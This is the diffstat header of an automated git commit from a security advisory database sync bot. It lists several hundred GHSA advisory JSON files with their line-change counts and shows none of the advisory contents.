From 94ba8290a1c67fa45fe9861d4c7747f336e5740c Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 6 Dec 2024 05:08:53 +0000 Subject: [PATCH] Advisory Database Sync --- .../10/GHSA-m836-gxwq-j2pm/GHSA-m836-gxwq-j2pm.json | 4 +--- .../11/GHSA-73qr-pfmq-6rp8/GHSA-73qr-pfmq-6rp8.json | 8 ++------ .../11/GHSA-g2q5-5433-rhrf/GHSA-g2q5-5433-rhrf.json | 8 ++------ .../05/GHSA-574f-mh6m-c6qm/GHSA-574f-mh6m-c6qm.json | 8 ++------ .../05/GHSA-977v-29j9-9rxc/GHSA-977v-29j9-9rxc.json | 8 ++------ .../05/GHSA-cmpm-jg8r-fv37/GHSA-cmpm-jg8r-fv37.json | 4 +--- .../05/GHSA-phw8-fw9g-v3xc/GHSA-phw8-fw9g-v3xc.json | 4 +--- .../03/GHSA-3x9g-xfj5-fq84/GHSA-3x9g-xfj5-fq84.json | 4 +--- .../05/GHSA-jj54-5q2m-q7pj/GHSA-jj54-5q2m-q7pj.json | 8 ++------ .../05/GHSA-v84h-653v-4pq9/GHSA-v84h-653v-4pq9.json | 8 ++------ .../05/GHSA-vhxv-fg4m-p2w8/GHSA-vhxv-fg4m-p2w8.json | 8 ++------ .../09/GHSA-2h46-8gf5-fmxv/GHSA-2h46-8gf5-fmxv.json | 4 +--- .../09/GHSA-cxww-7g56-2vh6/GHSA-cxww-7g56-2vh6.json | 4 +--- .../12/GHSA-4h4x-cgp7-h27m/GHSA-4h4x-cgp7-h27m.json | 4 +--- .../02/GHSA-mv36-g4g7-p396/GHSA-mv36-g4g7-p396.json | 8 ++------ .../04/GHSA-ffgj-53w4-8794/GHSA-ffgj-53w4-8794.json | 4 +--- .../04/GHSA-qxgp-gpc4-hhg2/GHSA-qxgp-gpc4-hhg2.json | 4 +--- .../05/GHSA-224f-2jgg-f9vc/GHSA-224f-2jgg-f9vc.json | 12 +++--------- .../05/GHSA-225w-f3mj-frvj/GHSA-225w-f3mj-frvj.json | 8 ++------ .../05/GHSA-23f5-wh7w-47gp/GHSA-23f5-wh7w-47gp.json | 8 ++------ .../05/GHSA-23hh-8f6m-x9cp/GHSA-23hh-8f6m-x9cp.json | 12 +++--------- .../05/GHSA-2423-333r-g3m8/GHSA-2423-333r-g3m8.json | 8 ++------ .../05/GHSA-244q-6gfm-pphc/GHSA-244q-6gfm-pphc.json | 12 +++--------- .../05/GHSA-248r-745f-7p46/GHSA-248r-745f-7p46.json | 8 ++------ .../05/GHSA-24cc-5mgg-6xch/GHSA-24cc-5mgg-6xch.json | 8 ++------ .../05/GHSA-24m6-qmjg-grqr/GHSA-24m6-qmjg-grqr.json | 8 ++------ .../05/GHSA-24xx-35j6-m7x4/GHSA-24xx-35j6-m7x4.json | 8 ++------ .../05/GHSA-259f-5jp2-pgmr/GHSA-259f-5jp2-pgmr.json | 12 +++--------- .../05/GHSA-25h7-w4hq-hgjg/GHSA-25h7-w4hq-hgjg.json | 8 ++------ .../05/GHSA-25m8-8r8g-crmg/GHSA-25m8-8r8g-crmg.json | 8 ++------ .../05/GHSA-25r3-fx4p-7qc5/GHSA-25r3-fx4p-7qc5.json | 8 ++------ .../05/GHSA-266j-ggfg-wh9m/GHSA-266j-ggfg-wh9m.json | 8 ++------ .../05/GHSA-269r-ppxf-6rgm/GHSA-269r-ppxf-6rgm.json | 8 ++------ .../05/GHSA-26ch-x2j2-w6vx/GHSA-26ch-x2j2-w6vx.json | 8 ++------ .../05/GHSA-27gv-5xfq-qrc6/GHSA-27gv-5xfq-qrc6.json | 8 ++------ .../05/GHSA-27v4-jvv2-r77h/GHSA-27v4-jvv2-r77h.json | 8 ++------ .../05/GHSA-2858-jrxx-h689/GHSA-2858-jrxx-h689.json | 8 ++------ .../05/GHSA-286p-v4j3-jjrh/GHSA-286p-v4j3-jjrh.json | 12 +++--------- .../05/GHSA-292r-44qm-39gx/GHSA-292r-44qm-39gx.json | 8 ++------ .../05/GHSA-2c95-h9c7-j48h/GHSA-2c95-h9c7-j48h.json | 8 ++------ .../05/GHSA-2cqq-3cpj-9xcq/GHSA-2cqq-3cpj-9xcq.json | 12 +++--------- .../05/GHSA-2cv7-399j-p9vv/GHSA-2cv7-399j-p9vv.json | 8 ++------ .../05/GHSA-2f2q-j862-78mf/GHSA-2f2q-j862-78mf.json | 8 ++------ .../05/GHSA-2g58-j9wc-pg3h/GHSA-2g58-j9wc-pg3h.json | 12 +++--------- .../05/GHSA-2gjh-pw8m-qmpj/GHSA-2gjh-pw8m-qmpj.json | 8 ++------ .../05/GHSA-2grg-mh77-gc8w/GHSA-2grg-mh77-gc8w.json | 8 ++------ .../05/GHSA-2hmv-7h55-42vc/GHSA-2hmv-7h55-42vc.json | 12 +++--------- .../05/GHSA-2hrv-x2vv-hm7r/GHSA-2hrv-x2vv-hm7r.json | 8 ++------ .../05/GHSA-2hwq-cc69-76h5/GHSA-2hwq-cc69-76h5.json | 8 ++------ .../05/GHSA-2j52-jv7p-x34h/GHSA-2j52-jv7p-x34h.json | 8 ++------ .../05/GHSA-2j7m-x4gh-v3m8/GHSA-2j7m-x4gh-v3m8.json | 8 ++------ .../05/GHSA-2jx2-275x-4xpq/GHSA-2jx2-275x-4xpq.json | 12 +++--------- .../05/GHSA-2m32-q4rj-65v2/GHSA-2m32-q4rj-65v2.json | 12 +++--------- .../05/GHSA-2mp5-w5jx-qmrm/GHSA-2mp5-w5jx-qmrm.json | 8 ++------ .../05/GHSA-2mwh-q6h5-vx3r/GHSA-2mwh-q6h5-vx3r.json | 8 ++------ .../05/GHSA-2p5v-xc8c-c7f4/GHSA-2p5v-xc8c-c7f4.json | 8 ++------ .../05/GHSA-2qp4-532r-wmc3/GHSA-2qp4-532r-wmc3.json | 8 ++------ .../05/GHSA-2qw3-j5gw-6h65/GHSA-2qw3-j5gw-6h65.json | 8 ++------ .../05/GHSA-2r95-rww6-2858/GHSA-2r95-rww6-2858.json | 12 +++--------- .../05/GHSA-2rg9-gvg8-5qq3/GHSA-2rg9-gvg8-5qq3.json | 8 ++------ .../05/GHSA-2v6j-6m6r-28qj/GHSA-2v6j-6m6r-28qj.json | 8 ++------ .../05/GHSA-2w93-5qhr-rvc6/GHSA-2w93-5qhr-rvc6.json | 8 ++------ .../05/GHSA-2x92-4r6r-mrfw/GHSA-2x92-4r6r-mrfw.json | 8 ++------ .../05/GHSA-2x9r-7w9v-hwjw/GHSA-2x9r-7w9v-hwjw.json | 12 +++--------- .../05/GHSA-2xxp-627h-jh7j/GHSA-2xxp-627h-jh7j.json | 8 ++------ .../05/GHSA-3225-8fvw-978w/GHSA-3225-8fvw-978w.json | 12 +++--------- .../05/GHSA-322p-76c5-wqq3/GHSA-322p-76c5-wqq3.json | 12 +++--------- .../05/GHSA-323x-m6wx-9h98/GHSA-323x-m6wx-9h98.json | 12 +++--------- .../05/GHSA-32gw-r878-mrx5/GHSA-32gw-r878-mrx5.json | 8 ++------ .../05/GHSA-32vf-6q42-4r57/GHSA-32vf-6q42-4r57.json | 8 ++------ .../05/GHSA-332c-xwph-rhqj/GHSA-332c-xwph-rhqj.json | 12 +++--------- .../05/GHSA-33gc-p3fc-rqq7/GHSA-33gc-p3fc-rqq7.json | 8 ++------ .../05/GHSA-33hq-r9r9-2w2h/GHSA-33hq-r9r9-2w2h.json | 8 ++------ .../05/GHSA-342p-mxjx-vxmw/GHSA-342p-mxjx-vxmw.json | 12 +++--------- .../05/GHSA-347x-pmh7-x2qr/GHSA-347x-pmh7-x2qr.json | 8 ++------ .../05/GHSA-34gv-vxwq-v84r/GHSA-34gv-vxwq-v84r.json | 8 ++------ .../05/GHSA-34gw-343r-pm56/GHSA-34gw-343r-pm56.json | 8 ++------ .../05/GHSA-34mg-j6f6-fj36/GHSA-34mg-j6f6-fj36.json | 8 ++------ .../05/GHSA-359m-8qm5-gh2f/GHSA-359m-8qm5-gh2f.json | 12 +++--------- .../05/GHSA-35cf-cqr4-fr2m/GHSA-35cf-cqr4-fr2m.json | 12 +++--------- .../05/GHSA-35g9-4fjq-g938/GHSA-35g9-4fjq-g938.json | 8 ++------ .../05/GHSA-35gp-6hvq-gx74/GHSA-35gp-6hvq-gx74.json | 12 +++--------- .../05/GHSA-363x-qxhw-jjx9/GHSA-363x-qxhw-jjx9.json | 8 ++------ .../05/GHSA-3822-wwjm-jgg2/GHSA-3822-wwjm-jgg2.json | 8 ++------ .../05/GHSA-38hc-j6w3-jg6w/GHSA-38hc-j6w3-jg6w.json | 12 +++--------- .../05/GHSA-38jr-m6hg-2c25/GHSA-38jr-m6hg-2c25.json | 12 +++--------- .../05/GHSA-38vh-68q7-274w/GHSA-38vh-68q7-274w.json | 12 +++--------- .../05/GHSA-3979-2hvm-67c3/GHSA-3979-2hvm-67c3.json | 12 +++--------- .../05/GHSA-39gp-f464-jp5h/GHSA-39gp-f464-jp5h.json | 8 ++------ .../05/GHSA-39p4-8vxf-w6mq/GHSA-39p4-8vxf-w6mq.json | 8 ++------ .../05/GHSA-3c65-jw75-c45f/GHSA-3c65-jw75-c45f.json | 8 ++------ .../05/GHSA-3ccc-w666-988q/GHSA-3ccc-w666-988q.json | 8 ++------ .../05/GHSA-3cj6-xrqf-w8rv/GHSA-3cj6-xrqf-w8rv.json | 8 ++------ .../05/GHSA-3f36-xgxj-8g4q/GHSA-3f36-xgxj-8g4q.json | 8 ++------ .../05/GHSA-3f6j-r62c-wxpv/GHSA-3f6j-r62c-wxpv.json | 8 ++------ .../05/GHSA-3f7j-hfc7-xqvr/GHSA-3f7j-hfc7-xqvr.json | 8 ++------ .../05/GHSA-3ff8-84vr-26hx/GHSA-3ff8-84vr-26hx.json | 12 +++--------- .../05/GHSA-3fj2-69h6-55v5/GHSA-3fj2-69h6-55v5.json | 8 ++------ .../05/GHSA-3gr9-x3xp-765c/GHSA-3gr9-x3xp-765c.json | 8 ++------ .../05/GHSA-3h7q-h379-g658/GHSA-3h7q-h379-g658.json | 8 ++------ .../05/GHSA-3hjw-v7hq-3973/GHSA-3hjw-v7hq-3973.json | 8 ++------ .../05/GHSA-3j3g-99r7-m38x/GHSA-3j3g-99r7-m38x.json | 8 ++------ .../05/GHSA-3j4w-c76p-2jvh/GHSA-3j4w-c76p-2jvh.json | 8 ++------ .../05/GHSA-3mc5-93px-3fm6/GHSA-3mc5-93px-3fm6.json | 8 ++------ .../05/GHSA-3mgg-22gr-vqxv/GHSA-3mgg-22gr-vqxv.json | 12 +++--------- .../05/GHSA-3mq9-phgq-f2wv/GHSA-3mq9-phgq-f2wv.json | 8 ++------ .../05/GHSA-3p28-g7gh-66v2/GHSA-3p28-g7gh-66v2.json | 8 ++------ .../05/GHSA-3p4f-49f4-vm6q/GHSA-3p4f-49f4-vm6q.json | 8 ++------ .../05/GHSA-3p4v-hp85-8j3w/GHSA-3p4v-hp85-8j3w.json | 8 ++------ .../05/GHSA-3pjm-j8pf-453f/GHSA-3pjm-j8pf-453f.json | 8 ++------ .../05/GHSA-3pp9-9wp8-5qp5/GHSA-3pp9-9wp8-5qp5.json | 8 ++------ .../05/GHSA-3v5j-fv58-rhv5/GHSA-3v5j-fv58-rhv5.json | 12 +++--------- .../05/GHSA-3w6q-chqr-4j8j/GHSA-3w6q-chqr-4j8j.json | 8 ++------ .../05/GHSA-3wqx-wh6r-cf85/GHSA-3wqx-wh6r-cf85.json | 8 ++------ .../05/GHSA-3x25-57q8-33g5/GHSA-3x25-57q8-33g5.json | 12 +++--------- .../05/GHSA-3x2r-3xr4-4cc3/GHSA-3x2r-3xr4-4cc3.json | 12 +++--------- .../05/GHSA-3xcj-9jh4-h55x/GHSA-3xcj-9jh4-h55x.json | 12 +++--------- .../05/GHSA-42fx-xh6m-j2c4/GHSA-42fx-xh6m-j2c4.json | 8 ++------ .../05/GHSA-43r8-6qx5-w655/GHSA-43r8-6qx5-w655.json | 8 ++------ .../05/GHSA-43rc-vwh5-26j7/GHSA-43rc-vwh5-26j7.json | 12 +++--------- .../05/GHSA-4426-49xv-wxg5/GHSA-4426-49xv-wxg5.json | 8 ++------ .../05/GHSA-44hv-hvc6-8h2r/GHSA-44hv-hvc6-8h2r.json | 8 ++------ .../05/GHSA-44mf-mmxh-h2w7/GHSA-44mf-mmxh-h2w7.json | 8 ++------ .../05/GHSA-44wq-5x49-35cx/GHSA-44wq-5x49-35cx.json | 8 ++------ .../05/GHSA-4537-mgq5-cjx2/GHSA-4537-mgq5-cjx2.json | 8 ++------ .../05/GHSA-464x-pxv9-7m7h/GHSA-464x-pxv9-7m7h.json | 12 +++--------- .../05/GHSA-468q-q36v-q9gc/GHSA-468q-q36v-q9gc.json | 8 ++------ .../05/GHSA-46qx-wwvq-35pg/GHSA-46qx-wwvq-35pg.json | 12 +++--------- .../05/GHSA-47pg-9x77-9rv9/GHSA-47pg-9x77-9rv9.json | 8 ++------ .../05/GHSA-47x7-6hxv-jc24/GHSA-47x7-6hxv-jc24.json | 8 ++------ .../05/GHSA-48w5-fx89-4hg4/GHSA-48w5-fx89-4hg4.json | 12 +++--------- .../05/GHSA-49pj-5fpc-q7mf/GHSA-49pj-5fpc-q7mf.json | 8 ++------ .../05/GHSA-49wq-86c4-8qrv/GHSA-49wq-86c4-8qrv.json | 8 ++------ .../05/GHSA-4cfx-p6p6-jpvw/GHSA-4cfx-p6p6-jpvw.json | 8 ++------ .../05/GHSA-4cqw-9fwv-7gjq/GHSA-4cqw-9fwv-7gjq.json | 12 +++--------- .../05/GHSA-4cvm-fc9f-m7w8/GHSA-4cvm-fc9f-m7w8.json | 8 ++------ .../05/GHSA-4cvv-jv4x-4gv8/GHSA-4cvv-jv4x-4gv8.json | 8 ++------ .../05/GHSA-4cwx-j38m-p4pm/GHSA-4cwx-j38m-p4pm.json | 12 +++--------- .../05/GHSA-4f8g-r594-5rqr/GHSA-4f8g-r594-5rqr.json | 12 +++--------- .../05/GHSA-4fmg-3w8m-vwwr/GHSA-4fmg-3w8m-vwwr.json | 8 ++------ .../05/GHSA-4gp3-xg6h-2whj/GHSA-4gp3-xg6h-2whj.json | 8 ++------ .../05/GHSA-4hg4-h2c8-wx99/GHSA-4hg4-h2c8-wx99.json | 8 ++------ .../05/GHSA-4hp4-89vv-6g9f/GHSA-4hp4-89vv-6g9f.json | 8 ++------ .../05/GHSA-4hqq-6fv5-q77v/GHSA-4hqq-6fv5-q77v.json | 8 ++------ .../05/GHSA-4jv2-g4w2-66wc/GHSA-4jv2-g4w2-66wc.json | 12 +++--------- .../05/GHSA-4m35-7rw5-2cp2/GHSA-4m35-7rw5-2cp2.json | 12 +++--------- .../05/GHSA-4m7w-g6rc-g3w7/GHSA-4m7w-g6rc-g3w7.json | 8 ++------ .../05/GHSA-4mvc-h443-m66c/GHSA-4mvc-h443-m66c.json | 12 +++--------- .../05/GHSA-4p57-32hf-84wc/GHSA-4p57-32hf-84wc.json | 8 ++------ .../05/GHSA-4p9w-hv3g-58rr/GHSA-4p9w-hv3g-58rr.json | 8 ++------ .../05/GHSA-4pfr-fjxw-j2c5/GHSA-4pfr-fjxw-j2c5.json | 12 +++--------- .../05/GHSA-4q8w-45jp-f7gv/GHSA-4q8w-45jp-f7gv.json | 8 ++------ .../05/GHSA-4qvv-4753-5fhg/GHSA-4qvv-4753-5fhg.json | 12 +++--------- .../05/GHSA-4rc8-fprc-92jm/GHSA-4rc8-fprc-92jm.json | 8 ++------ .../05/GHSA-4v8h-358m-9fvj/GHSA-4v8h-358m-9fvj.json | 8 ++------ .../05/GHSA-4x53-c6rv-jmrr/GHSA-4x53-c6rv-jmrr.json | 8 ++------ .../05/GHSA-4xmv-ghqx-jmpq/GHSA-4xmv-ghqx-jmpq.json | 8 ++------ .../05/GHSA-5225-89r9-8698/GHSA-5225-89r9-8698.json | 8 ++------ .../05/GHSA-53g7-46gp-g47p/GHSA-53g7-46gp-g47p.json | 8 ++------ .../05/GHSA-53jh-jfqq-xpqp/GHSA-53jh-jfqq-xpqp.json | 8 ++------ .../05/GHSA-54gg-h38v-cpcg/GHSA-54gg-h38v-cpcg.json | 8 ++------ .../05/GHSA-54q7-fcx3-88wp/GHSA-54q7-fcx3-88wp.json | 12 +++--------- .../05/GHSA-55gg-xp4m-w7g4/GHSA-55gg-xp4m-w7g4.json | 8 ++------ .../05/GHSA-55v4-fh45-vjcq/GHSA-55v4-fh45-vjcq.json | 8 ++------ .../05/GHSA-566w-735r-v996/GHSA-566w-735r-v996.json | 8 ++------ .../05/GHSA-568w-ch6p-wvmf/GHSA-568w-ch6p-wvmf.json | 12 +++--------- .../05/GHSA-56gq-w62x-558w/GHSA-56gq-w62x-558w.json | 8 ++------ .../05/GHSA-5822-f9hv-769j/GHSA-5822-f9hv-769j.json | 8 ++------ .../05/GHSA-582v-h4w6-q3j2/GHSA-582v-h4w6-q3j2.json | 8 ++------ .../05/GHSA-588m-jh6g-jgvm/GHSA-588m-jh6g-jgvm.json | 12 +++--------- .../05/GHSA-59cr-f6wj-285q/GHSA-59cr-f6wj-285q.json | 12 +++--------- .../05/GHSA-59jh-p9m4-jw22/GHSA-59jh-p9m4-jw22.json | 12 +++--------- .../05/GHSA-5c6j-76f2-jq69/GHSA-5c6j-76f2-jq69.json | 8 ++------ .../05/GHSA-5c6w-jx22-cv5x/GHSA-5c6w-jx22-cv5x.json | 12 +++--------- .../05/GHSA-5c92-3wqx-h2c3/GHSA-5c92-3wqx-h2c3.json | 8 ++------ .../05/GHSA-5crq-wjvq-g8mx/GHSA-5crq-wjvq-g8mx.json | 8 ++------ .../05/GHSA-5g25-2vp3-jgg2/GHSA-5g25-2vp3-jgg2.json | 12 +++--------- .../05/GHSA-5g5h-vp5m-chrx/GHSA-5g5h-vp5m-chrx.json | 4 +--- .../05/GHSA-5g62-v8vq-wrxx/GHSA-5g62-v8vq-wrxx.json | 8 ++------ .../05/GHSA-5h27-5vmq-pxwf/GHSA-5h27-5vmq-pxwf.json | 8 ++------ .../05/GHSA-5hfx-9rcx-q4hq/GHSA-5hfx-9rcx-q4hq.json | 12 +++--------- .../05/GHSA-5hjh-92hw-gcx5/GHSA-5hjh-92hw-gcx5.json | 8 ++------ .../05/GHSA-5hvx-fqqf-mwpp/GHSA-5hvx-fqqf-mwpp.json | 8 ++------ .../05/GHSA-5j3c-768x-m8c6/GHSA-5j3c-768x-m8c6.json | 8 ++------ .../05/GHSA-5jxm-f54p-34xg/GHSA-5jxm-f54p-34xg.json | 8 ++------ .../05/GHSA-5p8c-3w47-xggf/GHSA-5p8c-3w47-xggf.json | 8 ++------ .../05/GHSA-5pf8-m5c6-qc44/GHSA-5pf8-m5c6-qc44.json | 4 +--- .../05/GHSA-5q6p-qrmq-r3hp/GHSA-5q6p-qrmq-r3hp.json | 12 +++--------- .../05/GHSA-5q77-9538-2mfh/GHSA-5q77-9538-2mfh.json | 12 +++--------- .../05/GHSA-5qgf-p5r6-q832/GHSA-5qgf-p5r6-q832.json | 8 ++------ .../05/GHSA-5r5j-787w-2q4w/GHSA-5r5j-787w-2q4w.json | 8 ++------ .../05/GHSA-5v8q-7pvx-r4g5/GHSA-5v8q-7pvx-r4g5.json | 8 ++------ .../05/GHSA-5vgc-qp88-vfrj/GHSA-5vgc-qp88-vfrj.json | 12 +++--------- .../05/GHSA-5vhm-9jjq-c5j7/GHSA-5vhm-9jjq-c5j7.json | 8 ++------ .../05/GHSA-5vx7-3cmr-jg43/GHSA-5vx7-3cmr-jg43.json | 8 ++------ .../05/GHSA-5wqw-6333-5244/GHSA-5wqw-6333-5244.json | 8 ++------ .../05/GHSA-5x97-c6r4-fxj7/GHSA-5x97-c6r4-fxj7.json | 8 ++------ .../05/GHSA-5xf2-6qpg-8569/GHSA-5xf2-6qpg-8569.json | 8 ++------ .../05/GHSA-5xw7-vh5g-vh38/GHSA-5xw7-vh5g-vh38.json | 12 +++--------- .../05/GHSA-623g-v3mq-x97w/GHSA-623g-v3mq-x97w.json | 8 ++------ .../05/GHSA-62fh-wmvw-563c/GHSA-62fh-wmvw-563c.json | 8 ++------ .../05/GHSA-62gm-hh6p-wrqw/GHSA-62gm-hh6p-wrqw.json | 8 ++------ .../05/GHSA-62jw-6946-v2hx/GHSA-62jw-6946-v2hx.json | 8 ++------ .../05/GHSA-62v9-8446-g2pq/GHSA-62v9-8446-g2pq.json | 12 +++--------- .../05/GHSA-63m8-v7w4-mcq7/GHSA-63m8-v7w4-mcq7.json | 8 ++------ .../05/GHSA-6479-42hp-fcpg/GHSA-6479-42hp-fcpg.json | 8 ++------ .../05/GHSA-648f-mvj9-qmhq/GHSA-648f-mvj9-qmhq.json | 8 ++------ .../05/GHSA-64v8-p3x2-mg79/GHSA-64v8-p3x2-mg79.json | 8 ++------ .../05/GHSA-65c5-3vj4-jjjq/GHSA-65c5-3vj4-jjjq.json | 8 ++------ .../05/GHSA-65hj-j59j-72pr/GHSA-65hj-j59j-72pr.json | 8 ++------ .../05/GHSA-67rj-rmm8-3hm6/GHSA-67rj-rmm8-3hm6.json | 8 ++------ .../05/GHSA-67ww-jmxf-h84x/GHSA-67ww-jmxf-h84x.json | 8 ++------ .../05/GHSA-685w-7fmq-g82p/GHSA-685w-7fmq-g82p.json | 12 +++--------- .../05/GHSA-689j-26wf-j42h/GHSA-689j-26wf-j42h.json | 8 ++------ .../05/GHSA-68xm-h8w8-4r93/GHSA-68xm-h8w8-4r93.json | 12 +++--------- .../05/GHSA-69cf-fghj-vwjc/GHSA-69cf-fghj-vwjc.json | 12 +++--------- .../05/GHSA-6cjr-78qx-g328/GHSA-6cjr-78qx-g328.json | 12 +++--------- .../05/GHSA-6cxx-fm4f-4mx5/GHSA-6cxx-fm4f-4mx5.json | 8 ++------ .../05/GHSA-6f3j-w43m-66x8/GHSA-6f3j-w43m-66x8.json | 8 ++------ .../05/GHSA-6fph-4gc5-4w2m/GHSA-6fph-4gc5-4w2m.json | 8 ++------ .../05/GHSA-6fq3-6244-j925/GHSA-6fq3-6244-j925.json | 8 ++------ .../05/GHSA-6fvv-pmpx-fp4w/GHSA-6fvv-pmpx-fp4w.json | 8 ++------ .../05/GHSA-6gr3-vr3v-86j3/GHSA-6gr3-vr3v-86j3.json | 8 ++------ .../05/GHSA-6hm5-6qgh-43cp/GHSA-6hm5-6qgh-43cp.json | 8 ++------ .../05/GHSA-6j3w-mmjm-hjmc/GHSA-6j3w-mmjm-hjmc.json | 8 ++------ .../05/GHSA-6jcp-w5qc-vw4v/GHSA-6jcp-w5qc-vw4v.json | 8 ++------ .../05/GHSA-6jfg-6x32-98jf/GHSA-6jfg-6x32-98jf.json | 8 ++------ .../05/GHSA-6mc3-64r4-75hq/GHSA-6mc3-64r4-75hq.json | 8 ++------ .../05/GHSA-6p48-jg39-2mq7/GHSA-6p48-jg39-2mq7.json | 12 +++--------- .../05/GHSA-6p9j-c36f-hqcr/GHSA-6p9j-c36f-hqcr.json | 8 ++------ .../05/GHSA-6pm2-hwq9-c8rw/GHSA-6pm2-hwq9-c8rw.json | 8 ++------ .../05/GHSA-6pm3-7hqj-9f4c/GHSA-6pm3-7hqj-9f4c.json | 8 ++------ .../05/GHSA-6pv3-9mxc-r3vx/GHSA-6pv3-9mxc-r3vx.json | 12 +++--------- .../05/GHSA-6rcj-49pw-rg3x/GHSA-6rcj-49pw-rg3x.json | 8 ++------ .../05/GHSA-6vc4-967q-qmcm/GHSA-6vc4-967q-qmcm.json | 8 ++------ .../05/GHSA-6wxq-55hv-69gm/GHSA-6wxq-55hv-69gm.json | 12 +++--------- .../05/GHSA-6x3x-v7pj-7967/GHSA-6x3x-v7pj-7967.json | 8 ++------ .../05/GHSA-6x4j-7vp6-mhr5/GHSA-6x4j-7vp6-mhr5.json | 8 ++------ .../05/GHSA-6x4p-xfh8-hfpg/GHSA-6x4p-xfh8-hfpg.json | 8 ++------ .../05/GHSA-6x8h-r754-qv46/GHSA-6x8h-r754-qv46.json | 12 +++--------- .../05/GHSA-72c4-8fq6-q36h/GHSA-72c4-8fq6-q36h.json | 8 ++------ .../05/GHSA-72fr-c7pw-pqmv/GHSA-72fr-c7pw-pqmv.json | 8 ++------ .../05/GHSA-74f9-jmf7-mh4c/GHSA-74f9-jmf7-mh4c.json | 8 ++------ .../05/GHSA-754f-5xqj-fwmv/GHSA-754f-5xqj-fwmv.json | 8 ++------ .../05/GHSA-764x-f594-rv3g/GHSA-764x-f594-rv3g.json | 8 ++------ .../05/GHSA-7765-xqg7-xm5q/GHSA-7765-xqg7-xm5q.json | 8 ++------ .../05/GHSA-7794-cp73-4vx3/GHSA-7794-cp73-4vx3.json | 12 +++--------- .../05/GHSA-784q-3wpw-gfhc/GHSA-784q-3wpw-gfhc.json | 8 ++------ .../05/GHSA-78gp-c2rq-6jhr/GHSA-78gp-c2rq-6jhr.json | 12 +++--------- .../05/GHSA-78mp-rgcx-c47v/GHSA-78mp-rgcx-c47v.json | 12 +++--------- .../05/GHSA-7985-8hqh-8j5p/GHSA-7985-8hqh-8j5p.json | 8 ++------ .../05/GHSA-79xx-9qmj-6mhv/GHSA-79xx-9qmj-6mhv.json | 12 +++--------- .../05/GHSA-7c8v-gc52-cfg7/GHSA-7c8v-gc52-cfg7.json | 8 ++------ .../05/GHSA-7fhj-rrpr-r2cg/GHSA-7fhj-rrpr-r2cg.json | 12 +++--------- .../05/GHSA-7fmx-9c6x-xx9j/GHSA-7fmx-9c6x-xx9j.json | 8 ++------ .../05/GHSA-7fvc-5qxg-jmg7/GHSA-7fvc-5qxg-jmg7.json | 8 ++------ .../05/GHSA-7g3v-77m8-vx32/GHSA-7g3v-77m8-vx32.json | 8 ++------ .../05/GHSA-7g4j-cqwh-2jf3/GHSA-7g4j-cqwh-2jf3.json | 8 ++------ .../05/GHSA-7g5w-29m5-qfmq/GHSA-7g5w-29m5-qfmq.json | 8 ++------ .../05/GHSA-7gqj-8g2q-xjjx/GHSA-7gqj-8g2q-xjjx.json | 12 +++--------- .../05/GHSA-7gv4-fw33-jqcg/GHSA-7gv4-fw33-jqcg.json | 8 ++------ .../05/GHSA-7gv8-6v3x-g279/GHSA-7gv8-6v3x-g279.json | 8 ++------ .../05/GHSA-7j2w-r9hq-qch3/GHSA-7j2w-r9hq-qch3.json | 12 +++--------- .../05/GHSA-7jv3-hcrw-wvcq/GHSA-7jv3-hcrw-wvcq.json | 8 ++------ .../05/GHSA-7m32-f887-xfh8/GHSA-7m32-f887-xfh8.json | 8 ++------ .../05/GHSA-7mp8-94mg-r4v3/GHSA-7mp8-94mg-r4v3.json | 8 ++------ .../05/GHSA-7mvg-3f28-p6ww/GHSA-7mvg-3f28-p6ww.json | 8 ++------ .../05/GHSA-7p37-jwcq-c522/GHSA-7p37-jwcq-c522.json | 8 ++------ .../05/GHSA-7p5j-5f93-4m6j/GHSA-7p5j-5f93-4m6j.json | 8 ++------ .../05/GHSA-7ppg-m8wv-4c2q/GHSA-7ppg-m8wv-4c2q.json | 8 ++------ .../05/GHSA-7qfx-rm3x-wjcq/GHSA-7qfx-rm3x-wjcq.json | 12 +++--------- .../05/GHSA-7qhx-r6vc-f8xm/GHSA-7qhx-r6vc-f8xm.json | 8 ++------ .../05/GHSA-7rx8-fqcc-2mqg/GHSA-7rx8-fqcc-2mqg.json | 8 ++------ .../05/GHSA-7wh8-gg39-jghh/GHSA-7wh8-gg39-jghh.json | 8 ++------ .../05/GHSA-7x96-xj2v-4h8r/GHSA-7x96-xj2v-4h8r.json | 8 ++------ .../05/GHSA-7xq8-8r52-qr48/GHSA-7xq8-8r52-qr48.json | 8 ++------ .../05/GHSA-7xrq-f64r-6mhm/GHSA-7xrq-f64r-6mhm.json | 8 ++------ .../05/GHSA-82qw-gwpw-p58g/GHSA-82qw-gwpw-p58g.json | 12 +++--------- .../05/GHSA-836w-w693-xm8f/GHSA-836w-w693-xm8f.json | 12 +++--------- .../05/GHSA-83cp-2pcw-7rwm/GHSA-83cp-2pcw-7rwm.json | 8 ++------ .../05/GHSA-83vh-mv8c-q8vm/GHSA-83vh-mv8c-q8vm.json | 4 +--- .../05/GHSA-83xg-9xxq-j6f5/GHSA-83xg-9xxq-j6f5.json | 8 ++------ .../05/GHSA-8484-g3mc-3mr8/GHSA-8484-g3mc-3mr8.json | 8 ++------ .../05/GHSA-84wc-fvf8-mfp7/GHSA-84wc-fvf8-mfp7.json | 8 ++------ .../05/GHSA-85cc-pv92-m56v/GHSA-85cc-pv92-m56v.json | 8 ++------ .../05/GHSA-868w-34vr-f4r2/GHSA-868w-34vr-f4r2.json | 8 ++------ .../05/GHSA-86jr-59gf-89v2/GHSA-86jr-59gf-89v2.json | 12 +++--------- .../05/GHSA-87fr-xmgc-7vgp/GHSA-87fr-xmgc-7vgp.json | 8 ++------ .../05/GHSA-885x-vgwh-pfrr/GHSA-885x-vgwh-pfrr.json | 8 ++------ .../05/GHSA-8c32-34gf-q623/GHSA-8c32-34gf-q623.json | 8 ++------ .../05/GHSA-8c58-cj6j-7593/GHSA-8c58-cj6j-7593.json | 8 ++------ .../05/GHSA-8cj2-jg77-qj2p/GHSA-8cj2-jg77-qj2p.json | 4 +--- .../05/GHSA-8crx-gwv5-ffh5/GHSA-8crx-gwv5-ffh5.json | 8 ++------ .../05/GHSA-8f77-wf6x-fv8m/GHSA-8f77-wf6x-fv8m.json | 8 ++------ .../05/GHSA-8ffj-gcr2-r5wm/GHSA-8ffj-gcr2-r5wm.json | 8 ++------ .../05/GHSA-8gc9-8wj3-2rqj/GHSA-8gc9-8wj3-2rqj.json | 8 ++------ .../05/GHSA-8h28-5hcj-h4qw/GHSA-8h28-5hcj-h4qw.json | 12 +++--------- 